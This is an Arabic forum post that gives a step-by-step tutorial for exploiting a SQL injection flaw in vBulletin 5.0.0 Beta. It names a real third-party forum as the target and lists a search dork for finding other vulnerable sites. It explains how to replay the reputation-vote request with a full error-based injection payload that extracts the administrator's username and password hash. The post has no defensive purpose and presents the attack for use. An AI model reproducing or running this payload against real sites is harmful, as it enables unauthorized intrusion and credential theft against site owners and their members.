اليوم ساشرح تغرة في منتديات الفي بولتن 5
الشرح لvirusx-76 (اندلوسي) Morocco وارجو من كل من ينقل الموضوع ان ينقله مع الحقوق
نوع التغرة : SQL Injection
Powered by vBulletin™ Version 5.0.0 Beta : Dork
نبدا اول شئ نبحت بواسطة الدورك في العم خوخل الى ان تجد منتدجى مركب النسخة
انا ساجرب على هدا المنتدى http://www.trchobby.com
اوك اول خطوة قم بالتسجيل في المنتدى كعضو
بعدج دلك ندخل المنتدى ونبحت عن مواضيع الاعضاء
اي موضوع لاكني افضل انك تجيب موضوع للادمن كي تاخد الكاس مرة واحدة
ملاحظة كي تعرف الادمن بسرعة اضغط على اسم اي عضوفي المنتدى او اسم عضويتك
وسيكون الرابط على هدا الشكل http://www.trchobby.com/member/2-xxxx
مكان 2-xxx استبدلها بالرقم 1 وياتيك اسم الادمن
اوك نرحع للتغرة بعد ما جبت مشاركة او موضوع للادجمن ندهب في متصفح الموزيلا الى tools=) HTTP HEaders
ان لم نحدها حملها هنا https://addons.mozilla.org/en/firefo...e-http-headers
بعد الضعط على HTTP HEaders ادهب للصفحة اللي كاتب فيها الادمن واعطيه لايك
سيضهر لك كودات اختار السطر الدي يشبه هدا /ajax/api/reputation/vote HTTP/1.1
بعد دلك اضغط كلمة Replay في الاسفل
ستضهر لكنافدة جديدة مكتواب فيها noteid=somenumber لا تمسحها ستقوم بنسخ سطر استغلال التغرة
حنبها مباشرة
سطر استغلال التغرة وهو
) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
بعد دلك اضغط Replay ومبروك عليك سيعرض المعلومات على المتصفح او يعطيك ملف تحمله تجد بداخله البيانات
هدا رابط لتحميل الفديو + معلومات التغرة
http://download1401.mediafire.com/bg...tin+Latest.rar